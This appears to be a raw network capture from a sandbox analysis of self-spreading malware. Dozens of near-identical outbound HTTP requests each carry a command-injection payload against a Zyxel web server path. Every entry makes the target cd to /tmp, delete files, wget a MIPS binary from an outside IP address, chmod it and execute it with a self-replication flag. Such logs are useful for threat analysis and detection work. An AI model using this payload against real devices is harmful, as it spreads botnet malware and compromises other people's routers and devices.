                                      Jan 14, 2024 15:51:02.679171085 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8407192.168.2.1441320160.27.0.12443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:02.679219007 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8408192.168.2.145463061.113.184.227443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:02.679244041 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8409192.168.2.1459714219.108.240.9443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:02.679316044 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8410192.168.2.1434740181.24.121.139443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:02.679358006 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8411192.168.2.1448262213.47.173.150443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:02.679403067 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8412192.168.2.145223060.56.255.59443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:02.679440022 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8413192.168.2.1439874166.208.135.80443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:02.679481030 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8414192.168.2.1459956188.19.219.235443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:02.679536104 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8415192.168.2.144567424.85.103.118443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:02.679575920 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8416192.168.2.1458100138.185.76.22443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:02.679614067 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8417192.168.2.1447150102.86.238.196443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:02.679653883 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8418192.168.2.145550036.97.249.146443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:02.679691076 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8419192.168.2.1434942139.237.4.242443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:02.679717064 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8420192.168.2.145072894.145.210.245443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:02.679733992 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8421192.168.2.145363292.58.74.26443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:02.679780006 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8422192.168.2.1453542174.82.163.126443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:02.679812908 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8423192.168.2.1437918188.251.108.17443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:02.679857969 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8424192.168.2.1459576189.167.21.249443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:02.679889917 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8425192.168.2.1454800190.107.232.58443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:02.679928064 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8426192.168.2.1440708161.51.119.206443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:02.679977894 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8427192.168.2.1457670123.88.226.133443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:02.680021048 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8428192.168.2.144184058.117.140.50443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:02.680056095 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8429192.168.2.144646286.20.213.42443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:02.680109978 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8430192.168.2.144728296.64.24.179443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:02.680139065 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8431192.168.2.145082435.94.62.145443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:02.680160999 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8432192.168.2.1454434124.208.89.100443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:02.680222988 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8433192.168.2.1457668129.41.12.72443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:02.680270910 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8434192.168.2.145103880.247.137.107443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:02.680315971 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8435192.168.2.1443386145.58.66.108443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:02.680345058 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8436192.168.2.1452872179.178.140.65443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:02.680381060 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8437192.168.2.14538902.209.207.35443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:02.680418968 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8438192.168.2.143304232.125.2.189443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:02.680473089 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8439192.168.2.143643449.61.21.211443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:02.680529118 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8440192.168.2.1455690183.161.45.51443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:02.680571079 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8441192.168.2.1435198163.82.135.144443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:02.680628061 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8442192.168.2.1452844163.240.47.37443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:02.680668116 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8443192.168.2.143594293.15.90.216443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:02.680695057 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8444192.168.2.143330241.218.136.119443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:02.680752993 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8445192.168.2.1452364135.2.48.175443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:02.680792093 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8446192.168.2.1437190199.144.250.199443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:02.680814981 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8447192.168.2.1435268187.53.6.137443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:02.680845022 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8448192.168.2.1453696212.103.178.254443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:02.680877924 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8449192.168.2.1434270165.204.157.137443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:02.680923939 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8450192.168.2.144526413.132.209.228443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:02.680965900 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8451192.168.2.1457106167.228.227.198443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:02.681020021 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8452192.168.2.1449420153.39.180.161443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:02.681050062 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8453192.168.2.143603668.139.247.62443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:02.681082010 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8454192.168.2.1438428182.4.232.158443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:02.681118011 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8455192.168.2.144977698.13.226.191443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:02.681148052 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8456192.168.2.1446210211.151.140.252443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:02.681180000 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8457192.168.2.1436984139.9.83.6443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:02.681215048 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8458192.168.2.1441712141.30.239.67443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:02.681241989 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8459192.168.2.1458060115.59.88.216443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:02.681293011 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8460192.168.2.1450676177.225.177.156443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:02.681329012 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8461192.168.2.144551463.149.248.221443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:02.681360006 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8462192.168.2.1451316189.230.217.174443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:02.681390047 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8463192.168.2.1446846145.216.39.1443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:02.681457996 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8464192.168.2.146088497.147.138.104443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:02.681483984 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8465192.168.2.1445080196.156.209.71443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:02.681512117 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8466192.168.2.1459630141.191.106.34443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:02.681571007 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8467192.168.2.143606458.182.75.15443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:02.681602001 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8468192.168.2.145945085.216.155.34443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:02.681652069 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8469192.168.2.1437164101.22.44.172443
                                      TimestampBytes transferredDirectionData
